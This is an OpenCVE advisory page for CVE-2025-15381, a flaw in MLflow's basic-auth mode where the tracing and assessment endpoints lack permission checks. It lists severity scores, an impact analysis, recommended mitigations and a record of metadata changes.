Description
In the latest version of mlflow/mlflow, when the `basic-auth` app is enabled, tracing and assessment endpoints are not protected by permission validators. This allows any authenticated user, including those with `NO_PERMISSIONS` on the experiment, to read trace information and create assessments for traces they should not have access to. This vulnerability impacts confidentiality by exposing trace metadata and integrity by allowing unauthorized creation of assessments. Deployments using `mlflow server --app-name=basic-auth` are affected.
Published: 2026-03-27
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: Confidentiality and Integrity
Action: Immediate Patch
AI Analysis

Impact

During operation of the mlflow server, enabling the basic‑auth application removes permission checks from tracing and assessment endpoints. An authenticated user who normally lacks access to an experiment can therefore read all trace metadata and create new assessments for traces they should not see. This exposes sensitive data about runs and allows tampering with assessment results, potentially misleading downstream analytics or search results.

Affected Systems

The flaw affects installations of the MLflow data science platform that enable the basic‑auth app by launching the server with the option --app-name=basic-auth. All releases of MLflow that include this configuration are vulnerable; no specific version is listed, so any deployment running the app in this manner is impacted.

Risk and Exploitability

The vulnerability carries a CVSS score of 8.1, indicating high severity, but its EPSS score is below 1 %, suggesting a low likelihood of widespread exploitation at present. It is not cited in the CISA KEV catalog. Exploitation requires only that the attacker be authenticated to the MLflow instance; no additional privileges are needed beyond a standard user account. Because the affected endpoints lack permission checks, the attack surface is straightforward for any authenticated user.

Generated by OpenCVE AI on March 31, 2026 at 05:27 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Disable the basic‑auth app unless it is essential for your deployment.
  • Upgrade to a version of MLflow where tracing and assessment endpoints enforce permission validation, or apply any vendor‑issued patch.
  • Restrict authenticated users to only the experiments they are authorized to view by configuring role‑based access controls.
  • Verify that the server does not expose the vulnerability by attempting to access trace or assessment URLs with a user that lacks experiment permissions.
  • Monitor logs for abnormal tracing or assessment activity and apply remediation immediately if unauthorized actions are detected.

Generated by OpenCVE AI on March 31, 2026 at 05:27 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-g6pg-52vf-843h MLFlow allows Tracing + Assessments Access
History

Tue, 31 Mar 2026 03:00:00 +0000

Type Values Removed Values Added
Weaknesses CWE-425
References
Metrics threat_severity

None

 cvssV3_1

{'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}

threat_severity

Important

Mon, 30 Mar 2026 07:15:00 +0000

Type Values Removed Values Added
First Time appeared Mlflow
Mlflow mlflow/mlflow
Vendors & Products Mlflow
Mlflow mlflow/mlflow

Fri, 27 Mar 2026 20:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Fri, 27 Mar 2026 16:45:00 +0000

Type Values Removed Values Added
Description In the latest version of mlflow/mlflow, when the `basic-auth` app is enabled, tracing and assessment endpoints are not protected by permission validators. This allows any authenticated user, including those with `NO_PERMISSIONS` on the experiment, to read trace information and create assessments for traces they should not have access to. This vulnerability impacts confidentiality by exposing trace metadata and integrity by allowing unauthorized creation of assessments. Deployments using `mlflow server --app-name=basic-auth` are affected.
Title Unauthorized Access to Tracing and Assessment Endpoints in mlflow/mlflow
Weaknesses CWE-200
References
Metrics cvssV3_0

{'score': 8.1, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}

Subscriptions

Mlflow Mlflow/mlflow
cve-icon MITRE

Status: PUBLISHED

Assigner: @huntr_ai

Published:

Updated: 2026-03-28T03:55:49.775Z

Reserved: 2025-12-30T21:47:03.954Z

Link: CVE-2025-15381

cve-icon Vulnrichment

Updated: 2026-03-27T16:59:04.315Z

cve-icon NVD

Status : Awaiting Analysis

Published: 2026-03-27T17:16:26.573

Modified: 2026-03-30T13:26:29.793

Link: CVE-2025-15381

cve-icon Redhat

Severity : Important

Publid Date: 2026-03-27T16:17:30Z

Links: CVE-2025-15381 - Bugzilla

cve-icon OpenCVE Enrichment

Updated: 2026-03-31T20:01:03Z

Weaknesses